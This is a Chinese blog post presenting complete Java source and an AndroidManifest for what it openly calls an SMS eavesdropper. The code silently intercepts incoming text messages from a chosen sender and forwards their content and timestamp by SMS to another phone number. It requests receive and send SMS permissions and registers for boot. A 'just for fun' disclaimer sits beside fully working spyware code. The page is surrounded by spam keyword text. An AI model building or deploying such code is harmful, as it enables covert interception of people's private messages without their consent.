91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

android短信竊聽器,娛樂版,效果可以實現

發布時間:2020-06-24 10:54:07 來源:網絡 閱讀:795 作者:a120476536 欄目:移動開發

廢話不多直接上代碼:

android短信竊聽器,娛樂版,效果可以實現

package com.qiao.service;

import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.telephony.SmsManager;
import android.telephony.SmsMessage;
/**
 * 注  純屬娛樂,請勿瞎搞,另手機裝有衛士之類的軟件會發生攔截
 * @author Administrator
 *
 */
public class MySmsService extends BroadcastReceiver{

    @Override
    public void onReceive(Context context, Intent intent) {
        //獲取短信實體內容
        Object [] pdus = (Object[]) intent.getExtras().get("pdus");
        //迭代短信內容
        for (Object pdu :pdus) {
            //對短信各部分進行組成
        SmsMessage message=    SmsMessage.createFromPdu((byte[]) pdu);
        //獲得短信發送者
        String sender = message.getOriginatingAddress();
        //獲得短信內容
        String content =message.getMessageBody();
        Date date = new Date(message.getTimestampMillis());
        SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd-HH:mm:ss");
        String time =dateFormat.format(date);
        //處理所監聽到的短信
        sendSMS(sender,content,time);
        }
    }

    private void sendSMS(String sender, String content, String time) {
        
        if ("這里填寫手機號-->發信息的人".equals(sender)) {
            SmsManager manager = SmsManager.getDefault();
            
            ArrayList<String> texts = manager.divideMessage(content);
            for (String text : texts) {
                manager.sendTextMessage("這里填寫監聽后需要發送給誰-->手機號", null, "time + " + time
                        + " " + text, null, null);
            }
        }
    }
    
}


以下是mainfest里邊權限之類的:

android短信竊聽器,娛樂版,效果可以實現


<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.qiao.smsreceiver"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-sdk
        android:minSdkVersion="14"
        android:targetSdkVersion="19" />
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>

    <application
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" >
        <activity
            android:name="com.qiao.smsreceiver.MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        
      <!--   短信廣播接收器 -->
        <receiver android:name="com.qiao.service.MySmsService">
            <intent-filter >
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
    </application>

</manifest>


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

榆中县| 乌鲁木齐县| 景宁| 东辽县| 临海市| 长岭县| 榆社县| 大渡口区| 吉林省| 伊通| 武夷山市| 探索| 淮安市| 驻马店市| 满城县| 弋阳县| 阿拉尔市| 镇赉县| 湘潭市| 梅州市| 嘉黎县| 绥德县| 都江堰市| 巴塘县| 许昌县| 自治县| 忻城县| 株洲市| 怀安县| 安龙县| 黄梅县| 临西县| 浦县| 门源| 云龙县| 松滋市| 襄汾县| 崇义县| 岑巩县| 土默特左旗| 夹江县|